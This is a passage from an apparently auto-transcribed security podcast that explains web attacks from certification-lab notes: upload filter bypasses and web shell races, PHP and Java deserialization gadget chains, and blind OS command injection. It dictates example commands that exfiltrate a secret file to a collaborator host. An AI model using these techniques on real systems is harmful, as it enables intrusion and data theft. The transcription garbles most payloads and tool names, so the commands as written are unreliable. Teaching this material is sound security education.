Exactly. Bypass techniques are numerous and often creative. Simple obfuscated path traversal in the file name parameter .uploadsexploit.php might work if validation is weak. The null byte trick, exploit.phpc00.jpg, tries to bypass extension checks by terminating the file name before the fake.jdg, creating polyglot images files that are simultaneously valid images and contain executable code using tools like Exfiltration to hide PHP code in image metadata fields. Uploading a .htaccess file first, if allowed, can reconfigure Apache to treat files with normally harmless extensions, like .jpg, as executable PHP files. Bypassing MIME type checks by uploading a .php file but setting the content type header to imagepeg, sometimes even using GIF magic bytes. GIF89A at the start of a PHP file can fool basic content validation checks.
What about timing attacks?
Yes. The race condition web shell upload. This is needed when the application does check the uploaded file for malicious content, but only after saving it to a temporary web-accessible location for a brief moment. The attack involves uploading the malicious shell and simultaneously sending many requests to execute that shell in the temporary location, hoping to win the race before the security scan deletes it. Tools like Burp's Turbo Intruder are essential for sending these concurrent requests fast enough. It's a game of milliseconds. Hashtag insecure deserialization.
Okay, when data comes back to life, sometimes with unintended consequences, that sounds like insecure deserialization. What's happening there?
Insecure deserialization occurs when an application takes serialized data, basically data converted into a string or byte stream format for storage or transport, often from untrusted sources like user cookies or API parameters, and converts it back into a live object in memory without proper validation. If an attacker can control the serialized data, they can potentially create unexpected object types or manipulate object properties during this rehydration process. This can lead to all sorts of issues, often culminating in remote code execution.
How does that work in practice, say with PHP?
In PHP, it often manifests as arbitrary object injection. You look for classes in the application's codebase that have special magic methods, particularly destruct, which runs when an object is no longer referenced, or wakeup, runs during deserialization. An attacker finds a class with a useful magic method, example, one that deletes a file specified by an object property. They then craft a serialized PHP object string, like otot14, custom template.1.s.14.lock file path, s.23.homecarlosmoral.txt, setting the property to their target file. When the application deserializes this attacker-controlled string, it creates the custom template object with the attacker's file path. When that object eventually gets destroyed, the destruct method might run and delete the specified file, homecarlosmoral.txt.
And for other languages, like Java?
For Java deserialization vulnerabilities, the process is similar, but often relies on gadget chains, sequences of method calls across different classes, available on the application's class path that can be triggered by deserialization, ultimately leading to code execution. Tools like Burp Deserialization Scanner help detect potential vulnerabilities, and isoserial is the standard tool for generating serialized payloads using known gadget chains, like Commons Collections 3 or Jackson. A typical payload might try to make the server execute an OS command, like wget http.againstfile.com postfile homecarlos_secret to exfiltrate data. Sometimes you need a secret key too, right? Like exploiting PHP deserialization with a pre-built gadget chain where the serialized object needs to be signed. For example, if a PHP app uses Symfony components, you might find a leaked secret key, maybe in a public phpinfo.php file or source code. You'd then use a tool like phpGGC to generate a serialized payload using a suitable gadget chain, encode it, often base 64, sign it using the leaked secret key, and send it. The application trusts the signature, deserializes the object, and the gadget chain executes your command. Tag OS command injection.
All right, the final technical vulnerability for today. Direct access to the operating system OS command injection. Sounds like the holy grail for an attacker.
It often is. OS command injection allows an attacker to inject arbitrary operating system commands directly into application input fields or parameters, which the server then executes. It bypasses the application logic entirely and gives direct access to the underlying server.
How do you exploit this if you can't see the command output? Blind again.
Exactly, blind OS command injection. If you can't see the output, you need ways to exfiltrate data or confirm execution. Out-of-band techniques are common. Maybe there's a submit feedback function that takes user input. You use command separation characters, antival or backticks in some contexts, to chain your malicious command onto the legitimate one the application intended to run. Then you use techniques like DNS exfiltration. For example, enslookup, womi.osdefy.com, or curl, http.osdefy.com, cat home Carlos secret, cat the phone. The server executes your command, womi or cat, and the output becomes part of a DNS lookup or HTTP request back to your collaborator server. You see the hit, you get the data.
So the server calls home with the loot, What if even out-of-band is blocked?
Then you might try blind OS command injection with output redirection. Here, you inject a command that redirects its output to a file in a web-accessible directory. For example, wamivar www.dmli-output.txt. You inject the command, wait a moment, and then try to retrieve the output file using a normal web request, like get-imageoutput.txt. If you can read the file, you've got the command output. This often requires chaining it with a file path traversal vulnerability if the output location isn't directly web accessible, but you can reach it via LFI. It's often a multi-step process in blind scenarios.
Wow. Expert, that was an absolutely incredible deep dive. We've covered a really staggering array of web application vulnerabilities, everything from those subtle initial recon techniques all the way to these really intricate data exfiltration methods.
Okay, let's try to unpack this a bit for our listeners. What are the overarching strategies or maybe the mindset you need to navigate this kind of complexity, both as an attacker trying to find these things and maybe as a defender trying to stop them? That's a great question. A critical strategy, which we saw pop up again and again, is obfuscation. It's absolutely key for bypassing filters. We talked about WRL encoding, HTML encoding, XML encoding, using SQL CHR functions to avoid quotes. Understanding how to disguise your payloads, how to make malicious intent look benign to automated defenses, that's paramount.
Makes sense.
The utility of simple Python scripts is also really significant. Not just for fully automating exploitation, but even just for scripting quick checks, identifying potential vulnerabilities faster, or managing complex multi-stage attacks, especially when you're under time pressure. And thinking about a practical approach, particularly for multi-stage scenarios like those in the certification labs these notes came from. The strategic use of interactive versus non-interactive exploits is vital. If you can use an interactive vulnerability in one stage, maybe gain RCE to get a shell to then easily trigger a non-interactive vulnerability in the next stage, like reading a file only accessible to root, you can save yourself immense time and effort. And critically, maybe this sounds basic, but always use interactive checklists. Things like the BSCP.guide website. Meticulously track your attack phases, what you've tried, what worked, what didn't. It keeps you focused and prevents you from going down rabbit holes.
Right. So it's really about being able to not just pop an alert box and say, yep, XSS exists, but truly understanding how to identify the specific vulnerability type and then craft payloads for meaningful impact, like actually stealing cookies or gaining admin access or getting that RCE. Moving beyond just finding a bug to understanding its real potential, its consequences.
Exactly that. This deep knowledge of the different vulnerability classes, their nuances, and the common exploitation techniques, that's what's highly valued by employers and the whole cybersecurity community. It shows you can think critically, think like an adversary. And above all, perseverance is key. I mean, the definition is literally persistence in doing something despite difficulty or delay in achieving success. Web application security is a continuous learning process. This deep dive, while hopefully comprehensive, really just scratches the surface. The attackers are always evolving their techniques, and so our understanding has to constantly evolve too.
What a journey. We've really peeled back a lot of layers today on web application security.
It truly has.
Yeah.
And it really highlights the interconnectedness, doesn't it? How sometimes a seemingly small detail, a tiny misconfiguration, one line of code, one forgotten HTTP header, one overly permissive CORS policy can cascade into a really significant security breakthrough for an attacker. It's all about connecting those dots, seeing the potential chain reactions.
Expert, you've shown us just how many different ways an application can potentially be compromised. It's kind of mind-boggling. So given the sheer variety and complexity of all these attacks we've explored today, here's a final thought for you, our listener. What single vulnerability type do you think poses the greatest, perhaps often unseen threat to web applications today, and why? Something to chew on. Thank you so much for joining us on this deep dive into the fascinating and sometimes scary world of web application security. We'll see you next time on The Deep Dive.